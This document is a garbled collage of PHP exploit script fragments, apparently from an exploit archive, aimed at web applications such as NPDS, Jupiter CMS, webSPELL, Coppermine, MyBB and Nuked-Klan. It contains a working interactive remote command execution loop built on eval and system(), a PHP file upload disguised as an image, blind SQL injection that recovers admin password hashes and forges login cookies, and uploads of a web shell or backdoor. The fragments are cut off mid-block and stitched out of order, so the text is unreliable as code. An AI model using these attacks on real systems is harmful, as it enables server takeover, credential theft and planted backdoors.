function main()
{
    // Entry point of the exploit harness. Everything it calls besides the
    // standard library (phpsploit, head, get_p, cmd_prompt, add_slashes,
    // to_char) is defined elsewhere in this file.
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Prints the banner / usage text.
    head();
    // Target base URL; the second argument presumably marks it as required -- verify against get_p().
    $url = get_p('url', true);
    // Optional proxy settings.
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Route all requests through the proxy when one was given.
    if ($prh) {
        // proxyhost:proxyport, judging by the usage text of the sibling scripts on this page.
        $web->proxy($prh);
        // Basic proxy authentication, only meaningful together with a proxy host.
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    $byp = "1');";
    // PHP stub evaluated by the vulnerable host. It takes the command to run
    // from the custom "MypCode" request header; from the defender's side, a
    // request header carrying base64 that is not part of the application is
    // a strong detection signal for this class of attack.
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Random marker printed before and after the command output so the output
    // can be cut out of the surrounding page. rand() is sufficient here: the
    // marker only has to be unlikely to occur in the page, not unpredictable.
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Interactive loop; cmd_prompt() returns false to quit.
    while (($cmd = cmd_prompt()) !== false) {
        // The command is escaped by add_slashes() for the double-quoted system()
        // call and base64-encoded into the request header.
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Send the request; to_char() encodes the payload for the query string.
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Split the response on the marker: index 1 holds the command output.
        $res = explode($s_sep, $web->getcontent());
        // No marker pair in the response means the injected code did not run.
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            // Marker pair present but nothing between them.
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
#!/usr/bin/php
<?php 
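error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
# Usage banner; -url is the only required option.
if ($argc < 3) {
    print "\n  TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n   NOTE | Works regardless of php settings\n  USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy     If you wanna use a proxy <proxyhost:proxyport> \n        | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
    exit(1);
}
# getparam() is defined elsewhere in this file; the second argument presumably
# marks the option as mandatory.
$url = getparam('url', 1);
$pro = getparam('proxy');
# Fixed: the option was previously looked up as 'proyauth', so -proxyauth (the
# name advertised in the usage text above) was silently ignored.
$pra = getparam('proxyauth');
# phpsploit is the HTTP client class this script depends on (defined elsewhere).
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
# Proxy settings only apply when the corresponding option was given.
if ($pro) {
    $xpl->proxy($pro);
}
if ($pra) {
    $xpl->proxyauth($pra);
}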
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125.  settype ($lid, "integer");
# 126.  PrintPage("links",$DB, $lid);
#
# 30.  if ($oper=="links") {
# 31.  $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32.  list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40.  if ($DB) {
# 41.  $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
<?php

/*
Title:          Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
// Target base URL.
$url = ' http://localhost/jupiter/';
// phpsploit is the HTTP client class this script depends on (defined elsewhere).
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// Multipart form description; the bare frmdt_* names are presumably constants
// understood by phpsploit::formdata() -- verify against the class.
// The upload handler stores a file named "*.php" declared as image/jpeg, i.e.
// neither the filename extension nor the declared type is validated server
// side; that missing check is what a fix has to add.
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
$xpl->formdata($arr);
// Request the stored file back; its output shows whether the upload landed
// in a web-served directory.
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
# Usage banner; -url and -file are required, everything else is optional.
if ($argc < 5) {
    print "\n------   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   ------\n-----------------------------------------------------------------------\nPHP conditions: register_globals=On\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url <> -file <> [Options]\n Params: -url       For example http://victim.com/webspell/ \n         -file      The file you wanna upload (c99shell.php...)\nOptions: -prefix    Table prefix (default=webs)\n         -upmatch   The match which returns TRUE for the upload\n         -sqlmatch  The match which returns TRUE for the SQL injection\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/webspell/ -file c99shell.php\n-----------------------------------------------------------------------\n";
    exit(1);
}
# getparam() and blind() are defined elsewhere in this file.
$url = getparam('url', 1);
$file = getparam('file', 1);
# Optional overrides, each falling back to a default when the option is absent.
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs';
# Patterns (presumably regular expressions, given the escaping) that identify a
# successful upload and a TRUE answer from the injected query.
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
# blind() recovers one column of the admin row; judging by the -sqlmatch
# option this is a boolean-based blind SQL injection.
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
# The ws_auth cookie is literally "<id>%3A<hash>", so knowing the stored hash
# is enough to act as the admin without cracking it. The defensive fix is to
# bind sessions to server-side state instead of deriving them from the hash.
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
    print "\nExample.......: php xpl.php http://c.com/ admin passwd";
    print "\n---------------------------------------------------------\n";
    exit(1);
}
/*/
 [0] => xpl.php         [1] => http://localhost/cpg1410/
 [2] => root            [3] => toor
 [4] => localhost:8200  [5] => user:passwd
/*/
# Positional arguments as listed in the comment above; argv[4] and argv[5]
# (proxy host and proxy credentials) are optional and may be unset.
$url = $argv[1];
$adu = $argv[2];
$adp = $argv[3];
$pxs = $argv[4];
$pxa = $argv[5];
# phpsploit is the HTTP client class this script depends on (defined elsewhere).
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
# Presumably enables cookie persistence and redirect following across
# requests -- verify against the class.
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
# Proxy settings only apply when the optional arguments were given.
if (!empty($pxs)) {
    print "\nstatus> Using a proxy {$pxs}";
    $xpl->proxy($pxs);
}
if (!empty($pxa)) {
    print "\nstatus> Basic proxy authentification {$pxa}";
    $xpl->proxyauth($pxa);
}
/*/
 Table prefix.
# They must correct the problem at the source =)
#
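# Usage banner; -url is the only required option.
if ($argc < 3) {
    print "\n---  MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit  ---\n-----------------------------------------------------------------------\nPHP conditions: none\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url http://victim.com/ [Options]\n Params: -url       For example http://victim.com/myBB/\nOptions: -debug     Debug mod activated (debug_mybb.html)\n         -truetime  Server response time which returns true\n         -benchmark You can change the value used in benchmark()\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\n   Note: If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
    exit(1);
}
# getparam() and debug() are defined elsewhere in this file.
$url = getparam('url', 1);
# Optional tuning flags with their defaults.
$debug = getparam('debug') != '' ? 1 : 0;
$benchmark = getparam('benchmark') != '' ? getparam('benchmark') : '1000000';
# Fixed: getparam() was called with the undefined variables $proxy and
# $proxyauth instead of the option names, so -proxy and -proxyauth (as
# advertised in the usage text) never took effect.
$proxy = getparam('proxy');
$proxyauth = getparam('proxyauth');
$backdoor = 'uploads/avatars/backdoor.php';
# inc/cache/backdoor.php
$filetoed = 'index.lang.php';
# phpsploit is the HTTP client class this script depends on (defined elsewhere).
$xpl = new phpsploit();
$xpl->agent('Firefox');
# Proxy settings only apply when the corresponding option was given.
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
if ($debug) {
    debug(1);
}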
# There are two solutions to be logged in as administrator.
#
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
#              uid: 1
        return false;
    }
}
if ($_SERVER['argc'] == 7 or $_SERVER['argc'] == 8) {
    $host = $_SERVER['argv'][1];
    $path = $_SERVER['argv'][2];
    $prefix = $_SERVER['argv'][3];
    $gid = $_SERVER['argv'][4];
    $pid = $_SERVER['argv'][5];
    $uid = $_SERVER['argv'][6];
    if ($_SERVER['argc'] == 8) {
        $proxy = $_SERVER['argv'][7];
        echo "Proxy: {$proxy} \n";
        $xpl->proxy($proxy);
    }
    $xpl->agent('Internet Explorer');
    echo "exploiting...\n";
    echo "md5-hash: ";
    for ($i = 1; $i <= 32; $i++) {
        $found = false;
        $h = 48;
        while (!$found and $h <= 57) {
            if (istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)) {
                $found = true;
                echo chr($h);
            }
            $h++;
        }
        if (!$found) {
            $h = 97;
            while (!$found and $h <= 122) {
    print "\nRisk.level....: High";
    print "\nSrc.download..: www.alexphpteam.com";
    print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
    print "\nCredits.......: DarkFig";
    print "\n---------------------------------------------------------";
    print "\nUsage.........: php xpl.php <url>";
    print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
    print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
    print "\n---------------------------------------------------------\n";
    exit(1);
}
# Positional arguments: target URL, then the optional proxy host and proxy
# credentials (argv[2] and argv[3] may be unset).
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
# phpsploit is the HTTP client class this script depends on (defined elsewhere).
$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
# Proxy settings only apply when the optional arguments were given.
if (!empty($prs)) {
    $xpl->proxy($prs);
}
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
/*/
 |
 | index.php
 | =========
 | ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
 |
 |
 | livre_include.php -> Local File Inclusion
 | =================
     * @example $this->reset()
     * 
     */
    function reset($func = '')
    {
        // Partial resets: only the requested bucket is emptied. Loose (==)
        // comparison is kept on purpose, matching the semantics of switch().
        if ($func == 'header') {
            $this->header = array();
            return;
        }
        if ($func == 'cookie') {
            $this->cookie = array();
            return;
        }
        // Anything else (including the default '') clears all client state:
        // cookie jar, headers, cookies and the redirection setting.
        $this->cookiejar = '';
        $this->header = array();
        $this->cookie = array();
        $this->allowredirection = '';
    }
}
// Shared HTTP client handed to the exploit class; ipb_spl is defined elsewhere
// in this file.
$web = new phpsploit();
$web->cookiejar(1);
$web->agent('Mozilla Firefox');
$ipb = new ipb_spl();
// Assigned by reference (PHP 4 idiom) so the class and this script operate on
// the same client instance.
$ipb->web =& $web;
$ipb->main();
?>

# milw0rm.com [2008-08-29]
# ------------------------------------------------
# Author: DarkFig <*****@*****.**>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE);
# This file requires the phpsploit HTTP client class (defined elsewhere).
$xpl = new phpsploit();
# Target base URL.
$url = 'http://localhost/nk/';
# Optional proxy <proxyip>:<proxyport>; an empty string means no proxy.
$prx = '';
# Optional basic proxy authentication <proxyuser:proxypwd>.
$pra = '';
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
# Proxy settings only apply when the values above are non-empty.
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
# Positional settings, presumably consumed later in the script by index:
# [0] table prefix, [1] cookie prefix, [2] SQL conditions.
$config = array();
$config[] = 'nuked';
# table prefix
$config[] = 'nuked';
# cookie prefix
$config[] = 'ORDER by date LIMIT 1';
# sql conditions